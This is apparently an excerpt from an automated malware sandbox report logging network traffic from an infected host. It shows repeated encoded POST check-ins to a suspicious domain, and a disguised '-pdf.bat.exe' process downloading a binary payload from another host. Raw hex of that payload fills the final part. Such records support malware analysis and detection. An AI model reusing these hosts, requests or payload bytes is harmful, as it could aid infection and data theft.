                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 36 68 50 34 43 49 6d 57 44 75 6e 79 47 71 30 4d 74 4c 6a 35 72 34 39 4e 49 45 76 78 59 36 2b 70 70 44 4a 37 45 78 32 30 43 39 55 55 62 71 46 76 4f 76 73 42 52 54 45 51 44 64 53 45 5a 46 61 42 41 4d 78 71 2b 59 4b 4d 42 43 53 68 67 50 6f 46 6a 41 46 59 47 69 50 76 59 6b 4d 54 30 46 7a 70 79 45 58 74 39 6c 31 76 48 56 34 79 63 59 73 72 50 47 4f 4e 71 68 74 77 43 37 46 50 31 41 79 76 36 48 65 53 68 71 35 37 41 61 39 30 7a 4f 44 67 76 38 43 35 70 51 67 51 68 65 32 63 38 4e 32 2f 6a 6f 46 6d 43 64 68 42 30 51 64 71 65 6a 38 57 77 48 54 72 5a 77 3d 3d
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
                                                                                                                                              Oct 4, 2024 08:12:55.601840019 CEST595INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:55 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              91192.168.11.2049821162.213.249.21680
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:12:58.103259087 CEST833OUTPOST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 4f 70 6e 43 35 37 46 7a 53 30 48 39 55 55 50 61 46 6d 52 66 73 61 52 54 35 74 44 66 57 45 5a 46 4f 42 41 49 31 71 2b 70 4b 4e 54 69 54 48 31 66 6f 44 74 67 46 59 47 69 50 76 59 6e 77 35 30 46 4c 70 7a 31 6e 74 73 77 56 6f 4c 31 34 31 62 59 73 72 4c 47 4f 42 71 68 73 56 43 35 78 70 31 43 61 76 36 46 47 53 68 62 35 38 4f 61 38 39 2f 65 44 77 69 63 62 56 6f 54 6f 74 77 4f 33 50 36 2b 71 57 6d 2b 55 38 66 76 56 6c 33 44 42 59 61 54 46 2b 79 46 53 77 45 37 2b 58 4f 43 78 65 2b 44 68 66 53 63 4e 38 73 64 59 53 41 72 49 3d
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
                                                                                                                                              Oct 4, 2024 08:12:58.275003910 CEST595INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:12:58 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              92192.168.11.2049822162.213.249.21680
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:13:00.794446945 CEST2578OUTPOST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 47 70 6e 30 74 37 46 54 75 30 41 39 55 55 4d 61 46 72 52 66 73 62 52 54 68 70 44 66 4c 78 5a 47 32 42 61 74 68 71 34 62 75 4e 5a 69 54 48 33 66 6f 47 6a 41 46 33 47 6b 76 72 59 6b 59 35 30 46 4c 70 7a 32 2f 74 38 56 31 6f 4e 31 34 79 63 59 73 76 50 47 4f 6c 71 68 31 6f 43 36 64 66 31 79 36 76 35 6c 57 53 79 4e 74 38 43 61 38 2f 2b 75 43 76 69 63 6e 4b 6f 54 45 62 77 4f 43 53 36 39 4b 57 6e 76 39 2f 4b 74 68 4f 75 54 5a 52 46 41 35 63 6b 45 71 53 4c 4a 4b 4b 4b 78 6f 72 32 56 6c 64 54 75 5a 4c 34 38 55 61 44 50 4c 52 76 71 4f 50 51 5a 39 4f 73 54 73 2b 64 72 32 4f 6f 45 57 70 6f 4f 39 55 34 70 4c 43 74 74 47 58 6b 32 4a 37 77 75 44 33 66 4a 67 77 66 6a 43 48 6a 37 71 4a 48 31 42 79 6b 69 6d 77 34 37 63 4d 65 49 72 76 71 76 4a 4f 6b 48 4f 52 5a 45 72 35 31 30 6d 42 38 30 37 6e 77 56 4d 57 71 76 33 49 4c 63 46 6b 53 7a 65 4e 4e 79 53 6f 39 53 74 39 33 30 75 4a 45 5a 6b [TRUNCATED]
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPGpn0t7FTu0A9UUMaFrRfsbRThpDfLxZG2Bathq4buNZiTH3foGjAF3GkvrYkY50FLpz2/t8V1oN14ycYsvPGOlqh1oC6df1y6v5lWSyNt8Ca8/+uCvicnKoTEbwOCS69KWnv9/KthOuTZRFA5ckEqSLJKKKxor2VldTuZL48UaDPLRvqOPQZ9OsTs+dr2OoEWpoO9U4pLCttGXk2J7wuD3fJgwfjCHj7qJH1Bykimw47cMeIrvqvJOkHORZEr510mB807nwVMWqv3ILcFkSzeNNySo9St930uJEZkP5MxUYmDGtVBRKq5pS23LdUyvioCmtFk/NwkDkm71qzOjV1bX0X02hA0FBCHGnmdCp7Cg7dMdhOKbPkgJVXjsmhD5ehh43Ojvl7fLnVsvxUtlzeZ6DPGZsYxsYyQBVYwzQcyMWJqs1kPrfYwRld99CwvoBkDeIzb+wUID09j0RPr5GghUozDF/xOTzm4XQgXPULeAqSiVBqEHhIbC7Bu99FUFiLvwb6J6WNqN5md/XZRLsXPndFM2vcTlX0d8Qt8sS4huaCRKQLayv5CeL+JDFduaC1xmxlCCSCEkzxiJkcl/qw4V2EVvzdXD47FxFKJ7cvbjB7c9FzjTBJDFvT8pFWHwa0K88Iq2J+W3gqALF/kQ9FodBTgr3GqvhLrAaRlfMDqD3t+dvg1t/s9auPWb5rvEegqCnq6tr0dZp2IO7miwWY23JTdlQTIL+7QFXZNpv2p4Vlr5YDRla+mJthG5QNOVyq3NkA74f9E3DWwDhrtOf5I7kKantFcYNjXgz57gCpbNyTmLlHtAmQv30RvEiw2ztmi6d44txEGJ9Rm7PHMP2kjyZ7poKaAHML8kQu83P14S4tDm7BZIR0q3jOj3/nFNvyg33EzdovBH2owWiG/mkZxrE0ttftTtI5gcY3Z817dJOA4aSn0dPewtyP0uMnQGgXIbXjBMR [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:13:00.794466972 CEST5404OUTData Raw: 44 43 35 64 4b 69 6b 69 50 2f 41 2b 6e 33 4a 62 72 2f 6d 6d 62 66 55 2f 4e 39 5a 76 42 6e 37 72 76 5a 7a 49 78 59 58 44 55 61 30 30 30 4d 42 38 36 35 66 41 50 70 50 75 59 4f 54 39 38 39 49 79 62 78 39 44 6e 39 70 45 55 2f 78 6e 63 4d 2b 62 31 72
                                                                                                                                              Data Ascii: DC5dKikiP/A+n3Jbr/mmbfU/N9ZvBn7rvZzIxYXDUa000MB865fAPpPuYOT989Iybx9Dn9pEU/xncM+b1rAc1eAW2pwzC+vtYeyL9iiH47zyd6AsXVWBbbsGJmeDvH/zTcFMFZPoYdhQhjo06/7ndBMkokyu3uZSkDecSuGA+LlZQlGw4NUZ9rQjFelS4vSfbhcRyrEa0N0LBSIcxC0B5GO8o2O6xZno0U/qj/pxyLOJ8m18Uko
                                                                                                                                              Oct 4, 2024 08:13:00.993580103 CEST595INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:13:00 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              93192.168.11.2049823162.213.249.21680
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:13:03.490326881 CEST549OUTGET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:13:03.685246944 CEST225INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 04 Oct 2024 06:13:03 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Content-Length: 12
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                              Data Raw: 4a 44 51 4e 53 6d 47 51 51 51 58 42
                                                                                                                                              Data Ascii: JDQNSmGQQQXB


                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.11.2049728185.86.211.1364432236C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-10-04 06:06:05 UTC184OUTGET /tur.bin HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Host: fredy.ee
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              2024-10-04 06:06:05 UTC283INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 04 Oct 2024 06:06:05 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                              Connection: Upgrade, close
                                                                                                                                              Last-Modified: Thu, 03 Oct 2024 09:43:12 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Content-Length: 288320
                                                                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              2024-10-04 06:06:05 UTC7909INData Raw: 80 77 6d a9 68 d0 ba 3c 7a e0 03 41 94 44 2d d1 60 64 a6 48 c7 66 a5 84 29 0f 6d c4 59 be 76 e5 fe 7d b0 10 a7 6d 16 d8 d5 54 a4 51 d3 50 c0 a2 34 a4 99 bd 63 28 6a f3 32 d9 82 ad 26 0a e1 48 64 4f fb 12 bb 21 5d 4e 24 9f 65 65 bf 4d 55 3e a9 3f 9d 70 61 b6 3c ee b7 73 b1 00 62 00 51 27 48 c7 37 d0 2d f6 4e 21 26 70 ec ce fa e2 b0 3d a1 2f a5 c5 fb 29 35 76 f4 53 6b e8 47 30 88 a5 3f cc 78 eb b7 87 53 36 f9 71 f4 2d e5 67 ec 76 f2 3d ae 20 fe 7f bb 30 ec bd c2 9e 30 36 22 b9 d7 a2 9b 86 e8 13 7d b4 79 ab 15 d0 ab a4 32 89 85 79 bf db 95 bf 34 75 f7 ae 58 93 4f 5f b0 c7 58 df b5 49 19 12 e0 28 31 9e 4f 90 40 fe 9c 34 51 d5 31 f7 2e 3b 34 d1 6f 95 77 4d b8 0a 21 01 52 9b 34 a6 64 a0 10 b8 20 87 72 8d 75 59 32 81 be b7 b1 4d 2c c0 9d 0b 14 5e 9c b2 bf f9 6a
                                                                                                                                              Data Ascii: wmh<zAD-`dHf)mYv}mTQP4c(j2&HdO!]N$eeMU>?pa<sbQ'H7-N!&p=/)5vSkG0?xS6q-gv= 006"}y2y4uXO_XI(1O@4Q1.;4owM!R4d ruY2M,^j
                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: 84 70 c5 ee 5d d8 e8 b4 da c2 bd 4e 1f ab 7b 05 85 1b 8e 2c c8 ff d7 45 66 11 e5 48 7f de 3f 42 32 78 39 31 4d 39 2f 44 1b 9c b2 4b 87 8b 7f 7a 59 13 8b c7 19 e7 a8 87 e1 a7 4e 48 8e 19 8c b4 1a 86 ab a4 b0 b1 67 e1 c5 8b aa 2b 1a 15 c4 73 e3 c0 b8 1c f5 51 c7 b8 fc 79 8c ed a6 25 6c 9c cc b6 45 99 22 e2 42 ef ce 8e 32 a6 dc fe bd b5 7b 5d 05 40 33 81 3b 23 6a 65 59 2f a8 8f c8 1a 27 67 26 77 d4 dc 8d f8 65 2e 90 66 9a d6 64 52 80 42 d5 b0 61 f7 ba df 8b b4 06 00 9a 9a 32 44 bb 88 68 3e d7 52 01 f6 ff 99 c2 86 86 ad 36 f8 4d 61 2c 95 ff bc 41 1d b0 89 1e 6d 95 c0 12 a5 24 ea 13 ce af 74 a9 64 d9 cb 6c d3 59 eb fc 85 08 e4 34 ef 92 e8 ba 64 c1 de 14 85 b8 47 5a c5 d3 74 23 1e 25 4f 4e db 9a 08 d4 7e 4e e6 37 7a 4a c2 06 e8 7f 9b 29 25 80 15 29 5d 93 13 a5
                                                                                                                                              Data Ascii: p]N{,EfH?B2x91M9/DKzYNHg+sQy%lE"B2{]@3;#jeY/'g&we.fdRBa2Dh>R6Ma,Am$tdlY4dGZt#%ON~N7zJ)%)]
                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: cc aa 21 d2 ba 06 42 ab 28 01 fa 5d 4d 40 cd 9a 5f 49 87 fa 6b f1 22 5c fe e8 02 0d 1d d3 40 f7 b8 99 b2 85 41 f5 f6 ca 04 6d 31 f0 60 28 f1 02 ea 5b cd 46 17 46 32 54 cc 14 1c ba fd c5 88 59 56 28 14 22 12 15 2d 6c 96 33 20 fe 49 a0 f4 23 52 1d a6 89 4e 78 dd ab da d0 cd 24 f1 5c 75 3c 40 ef 5f 69 c7 68 c9 11 d8 39 5b cc a5 b0 55 ef 3d e0 a3 c9 10 ad e1 32 17 84 7f 5e d0 0d 0e 1d 09 01 07 43 2c e6 22 a9 7b 6c 8b 28 d1 cf a4 0d ab 62 d8 87 58 2b 3a eb be 79 72 1f 07 72 4e b2 0b 89 bf 8b ff a0 59 19 37 4c db c4 f1 34 5d cb 1e 38 2d e5 ee db 4e 6a 58 9f 1c 6f 3b 35 42 6e 1e 3a 5b 5e 1c 0e f3 81 6d 6f 65 b3 4d 81 37 5d 01 c9 1a d9 6d 1b ed 6f d6 12 77 33 45 90 9a 0c 6f 33 2d 3e df 29 d3 42 a2 e6 85 39 86 4f 13 5b 5c 5d 04 8a 38 8c 8c 55 2b 67 39 31 89 cb 93
                                                                                                                                              Data Ascii: !B(]M@_Ik"\@Am1`([FF2TYV("-l3 I#RNx$\u<@_ih9[U=2^C,"{l(bX+:yrrNY7L4]8-NjXo;5Bn:[^moeM7]mow3Eo3->)B9O[\]8U+g91
                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: fd fc 40 54 c3 aa 74 83 59 35 60 4d ae 8c 1d bb fe fe e9 4c 7d df c5 19 f6 e8 cf cb 64 d1 b1 4c bb 65 7c 93 00 34 e0 70 41 e6 1d f6 44 7d 0e 97 93 29 88 71 af b0 bf ef 82 e0 b4 25 c7 18 57 c4 09 a6 f9 3a bd 02 7f fa 83 fc a0 e8 c1 3e be 68 d9 fb e5 1c ec 0e ee 5a 46 5d a9 86 d3 67 a2 fb dd 7a e2 d4 26 c3 91 24 3a 96 56 92 5c a0 d6 2c 63 fb dc b4 6a 1f 5c cb ac 15 d5 04 d8 a9 bc 31 f9 da c5 f0 64 85 3a db 33 29 4d 05 9c 8e eb e7 ff a0 06 46 70 4d 56 b3 17 fd 25 69 98 ac af 30 7c 87 07 c0 73 0e fe 9e 65 2b 3d 3e 48 f3 82 a8 1f d7 0f 0a a3 17 5e 99 a8 04 94 cc cf bd e0 01 b0 44 dd 3c 2f 4a 8d 19 8e 04 70 8f 2f b5 bf 72 41 a1 58 5d 27 3d e9 eb 0f cd d1 c9 fe 8e 91 a0 83 56 c2 b8 b3 36 0a e6 86 d7 2b a4 de 7e 85 cf bf 62 22 49 ae c1 f3 bb d3 be 46 84 3f ce 22
                                                                                                                                              Data Ascii: @TtY5`ML}dLe|4pAD})q%W:>hZF]gz&$:V\,cj\1d:3)MFpMV%i0|se+=>H^D</Jp/rAX]'=V6+~b"IF?"
                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: c6 d6 d0 ae 67 c8 fe d9 69 51 ca 24 65 f9 64 c0 88 dc 9c 93 94 6b a8 a8 79 f8 66 e4 f4 e0 dc 46 48 d1 4d cb 96 1d 93 b5 e2 c9 09 e2 ef da 4c 78 18 43 b6 f3 07 a5 44 eb 94 87 3e c0 42 c8 f4 7e b1 ad c0 9a 51 9b 60 b8 fa 53 69 95 1e ed 73 f5 d3 f7 b0 31 d0 fe 77 f9 75 ff 50 e1 78 4d c9 7d d2 6e b2 ae 95 e4 49 a3 5b 74 a8 93 0c 85 58 97 d5 8c 5e e9 f9 75 c6 2c 52 fb d4 76 38 7a 31 f2 d4 f6 a4 f6 8c 07 62 9b 65 e4 8e 00 96 d9 82 d7 69 17 45 21 c7 57 64 17 fa 4b 41 c5 a4 f1 24 8a 8a ab f0 6c f5 12 b2 c6 1d 45 0f 04 8f ed b9 34 80 ff 56 00 17 5c bc d9 38 c7 f0 40 54 86 ee 92 42 9b 06 7a 40 fa 04 d6 36 16 e5 74 89 b4 7f e3 1d 9f 79 94 36 50 75 ad b7 cc 53 fc 86 c5 ee 9a 5f c4 9c a8 76 45 35 7d eb 8e 78 27 18 7a 35 85 ba 12 8a 19 6d 7e a8 a5 64 f3 a5 99 88 6d ac
                                                                                                                                              Data Ascii: giQ$edkyfFHMLxCD>B~Q`Sis1wuPxM}nI[tX^u,Rv8z1beiE!WdKA$lE4V\8@TBz@6ty6PuS_vE5}x'z5m~dm
                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: 82 4b b9 d5 a8 01 c8 eb 3e a5 35 ad a3 b0 3f 4f 51 a8 97 70 49 82 8b 9e fa 84 5d 8c a6 55 9d 64 4b 87 25 52 c4 d8 0a 36 0e c8 08 86 b9 0a a3 74 b2 88 84 39 48 99 86 07 37 cf a7 20 22 f5 f7 d5 78 6b 4e 88 91 54 45 8e 66 20 7a 05 d9 eb 89 e9 61 32 0e 67 24 40 b4 a8 42 6d 97 01 c0 46 1d b0 5c db 8b 38 aa 17 5a f9 68 4b 96 0e 47 6e 93 53 ea 34 b0 ca 17 56 92 f1 5c c5 ae 35 7c b6 1d 63 e4 db 2d 84 1d b4 c2 e2 01 f2 35 59 2c fd 3a 55 06 9e e1 26 5d ff 8c 4e 4e 8c 1a de 68 53 a8 57 3e 50 7a 6e 8b ae 9e c8 cd 95 67 b8 f4 1c ad 44 a5 7a d9 39 64 60 63 ce 42 28 5c 9c d8 df c9 06 f3 ba 58 06 d7 b0 65 28 14 bb fa f7 7f 67 35 d5 ab ef e3 30 2b 72 e4 c3 17 1c b5 00 a5 70 81 27 5a 92 4f 54 8b 53 55 e0 22 27 63 09 54 30 33 bb eb 4f 3b c4 bd c1 a8 b6 a8 3c b9 a4 90 60 72
                                                                                                                                              Data Ascii: K>5?OQpI]UdK%R6t9H7 "xkNTEf za2g$@BmF\8ZhKGnS4V\5|c-5Y,:U&]NNhSW>PzngDz9d`cB(\Xe(g50+rp'ZOTSU"'cT03O;<`r
